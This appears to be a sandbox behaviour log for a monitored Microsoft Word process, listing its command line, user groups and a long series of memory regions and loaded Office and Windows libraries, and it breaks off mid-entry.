# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 09:56:49.635 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe" page_root = "0x45b65000" os_pid = "0xd1c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 259 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 260 start_va = 0x60000 end_va = 0x63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 261 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 262 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 263 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 264 start_va = 0x100000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 265 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 266 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 267 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 268 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 269 start_va = 0x180000 end_va = 0x181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 270 start_va = 0x190000 end_va = 0x192fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 271 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 272 start_va = 0x1b0000 end_va = 0x1b2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 273 start_va = 0x1c0000 end_va = 0x1c2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 274 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 275 start_va = 0x1e0000 end_va = 0x1e2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 276 start_va = 0x1f0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 277 start_va = 0x220000 end_va = 0x221fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 278 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 279 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 280 start_va = 0x380000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 281 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 282 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 283 start_va = 0x4f0000 end_va = 0x4f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 284 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 285 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 286 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 287 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 288 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 289 start_va = 0x730000 end_va = 0x734fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 290 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 291 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 292 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 293 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 294 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 295 start_va = 0xd50000 end_va = 0xe2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 296 start_va = 0xe30000 end_va = 0xe31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 297 start_va = 0xe40000 end_va = 0xe4cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 298 start_va = 0xe50000 end_va = 0xe50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 299 start_va = 0xe60000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 300 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 301 start_va = 0xee0000 end_va = 0xef6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 302 start_va = 0xf00000 end_va = 0xf00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 303 start_va = 0xf10000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 304 start_va = 0x1010000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 305 start_va = 0x1110000 end_va = 0x1110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 306 start_va = 0x1120000 end_va = 0x1121fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 307 start_va = 0x1140000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 308 start_va = 0x1190000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 309 start_va = 0x11d0000 end_va = 0x11e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 310 start_va = 0x11f0000 end_va = 0x13c8fff monitored = 0 entry_point = 0x11f1000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe") Region: id = 311 start_va = 0x13d0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 312 start_va = 0x27d0000 end_va = 0x33c1fff monitored = 0 entry_point = 0x27d1000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll") Region: id = 313 start_va = 0x33d0000 end_va = 0x348ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 314 start_va = 0x3490000 end_va = 0x34cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 315 start_va = 0x34e0000 end_va = 0x35dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 316 start_va = 0x3690000 end_va = 0x36cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 317 start_va = 0x36e0000 end_va = 0x371ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 318 start_va = 0x3720000 end_va = 0x375ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 319 start_va = 0x3770000 end_va = 0x37affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 320 start_va = 0x38e0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 321 start_va = 0x3950000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 322 start_va = 0x39b0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 323 start_va = 0x3a10000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 324 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 325 start_va = 0x3dc0000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dc0000" filename = "" Region: id = 326 start_va = 0x41c0000 end_va = 0x4aeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 327 start_va = 0x4b00000 end_va = 0x4b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 328 start_va = 0x4b40000 end_va = 0x4bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 329 start_va = 0x4bd0000 end_va = 0x4bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 330 start_va = 0x4be0000 end_va = 0x4c5efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 331 start_va = 0x4c80000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 332 start_va = 0x4d90000 end_va = 0x4dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 333 start_va = 0x4df0000 end_va = 0x4eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 334 start_va = 0x4f40000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 335 start_va = 0x50b0000 end_va = 0x50bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 336 start_va = 0x50c0000 end_va = 0x58bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050c0000" filename = "" Region: id = 337 start_va = 0x58d0000 end_va = 0x59cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 338 start_va = 0x59d0000 end_va = 0x5a7afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 339 start_va = 0x5a90000 end_va = 0x5b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 340 start_va = 0x5b90000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b90000" filename = "" Region: id = 341 start_va = 0x5da0000 end_va = 0x5e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005da0000" filename = "" Region: id = 342 start_va = 0x5eb0000 end_va = 0x5faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 343 start_va = 0x5fb0000 end_va = 0x606cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "arial.ttf" filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf") Region: id = 344 start_va = 0x6090000 end_va = 0x609ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 345 start_va = 0x60a0000 end_va = 0x649ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060a0000" filename = "" Region: id = 346 start_va = 0x6570000 end_va = 0x65affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006570000" filename = "" Region: id = 347 start_va = 0x65b0000 end_va = 0x6688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065b0000" filename = "" Region: id = 348 start_va = 0x66e0000 end_va = 0x671ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066e0000" filename = "" Region: id = 349 start_va = 0x6720000 end_va = 0x6b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006720000" filename = "" Region: id = 350 start_va = 0x6b20000 end_va = 0x6f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b20000" filename = "" Region: id = 351 start_va = 0x6f20000 end_va = 0x771ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f20000" filename = "" Region: id = 352 start_va = 0x7720000 end_va = 0x7b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007720000" filename = "" Region: id = 353 start_va = 0x7b30000 end_va = 0x7f30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b30000" filename = "" Region: id = 354 start_va = 0x7f40000 end_va = 0x8340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f40000" filename = "" Region: id = 355 start_va = 0x8350000 end_va = 0x854ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008350000" filename = "" Region: id = 356 start_va = 0x8550000 end_va = 0x894ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008550000" filename = "" Region: id = 357 start_va = 0x366f0000 end_va = 0x366fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000366f0000" filename = "" Region: id = 358 start_va = 0x66cb0000 end_va = 0x674a4fff monitored = 0 entry_point = 0x66d15279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll") Region: id = 359 start_va = 0x674b0000 end_va = 0x67607fff monitored = 0 entry_point = 0x674b133c region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 360 start_va = 0x67610000 end_va = 0x67660fff monitored = 0 entry_point = 0x6763988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 361 start_va = 0x67670000 end_va = 0x6769cfff monitored = 0 entry_point = 0x676862dc region_type = mapped_file name = "osppc.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 362 start_va = 0x676a0000 end_va = 0x676a7fff monitored = 0 entry_point = 0x676a2ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 363 start_va = 0x676b0000 end_va = 0x67709fff monitored = 0 entry_point = 0x676b1f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 364 start_va = 0x67710000 end_va = 0x678b1fff monitored = 0 entry_point = 0x67711000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll") Region: id = 365 start_va = 0x678c0000 end_va = 0x6794cfff monitored = 1 entry_point = 0x678d2860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 366 start_va = 0x67950000 end_va = 0x67999fff monitored = 1 entry_point = 0x67952e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 367 start_va = 0x679a0000 end_va = 0x679a7fff monitored = 0 entry_point = 0x679a10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 368 start_va = 0x679b0000 end_va = 0x67aaafff monitored = 0 entry_point = 0x679c17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 369 start_va = 0x67ab0000 end_va = 0x67bb9fff monitored = 0 entry_point = 0x67b4146c region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 370 start_va = 0x67bc0000 end_va = 0x67cebfff monitored = 0 entry_point = 0x67cc5cf2 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 371 start_va = 0x67cf0000 end_va = 0x67d29fff monitored = 0 entry_point = 0x67d0fab7 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 372 start_va = 0x67d30000 end_va = 0x67d5bfff monitored = 0 entry_point = 0x67d501f8 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 373 start_va = 0x67d60000 end_va = 0x67e77fff monitored = 0 entry_point = 0x67d640b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msptls.dll") Region: id = 374 start_va = 0x67e80000 end_va = 0x67ff4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 375 start_va = 0x68000000 end_va = 0x6800efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 376 start_va = 0x68010000 end_va = 0x680b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 377 start_va = 0x680c0000 end_va = 0x6cefefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll") Region: id = 378 start_va = 0x6cf00000 end_va = 0x6d820fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll") Region: id = 379 start_va = 0x6d830000 end_va = 0x6db37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll") Region: id = 380 start_va = 0x6db40000 end_va = 0x6db68fff monitored = 0 entry_point = 0x6db46b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 381 start_va = 0x6db70000 end_va = 0x6db7cfff monitored = 0 entry_point = 0x6db711e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 382 start_va = 0x6db80000 end_va = 0x6dc39fff monitored = 0 entry_point = 0x6dbe253f region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 383 start_va = 0x6dc40000 end_va = 0x6e9f1fff monitored = 0 entry_point = 0x6dc41000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 384 start_va = 0x6ea00000 end_va = 0x6ea20fff monitored = 0 entry_point = 0x6ea0c008 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 385 start_va = 0x6ea30000 end_va = 0x6ea39fff monitored = 0 entry_point = 0x6ea34d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 386 start_va = 0x6ea40000 end_va = 0x6efd7fff monitored = 0 entry_point = 0x6ea41000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 387 start_va = 0x6efe0000 end_va = 0x6f6f4fff monitored = 0 entry_point = 0x6efe1000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 388 start_va = 0x6f700000 end_va = 0x6fa01fff monitored = 0 entry_point = 0x6f701000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 389 start_va = 0x6fa10000 end_va = 0x6fbe4fff monitored = 0 entry_point = 0x6fa11000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 390 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 391 start_va = 0x707f0000 end_va = 0x7097ffff monitored = 0 entry_point = 0x7088d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 392 start_va = 0x70980000 end_va = 0x70a02fff monitored = 0 entry_point = 0x709913b0 region_type = mapped_file name = "dxgi.dll" filename = 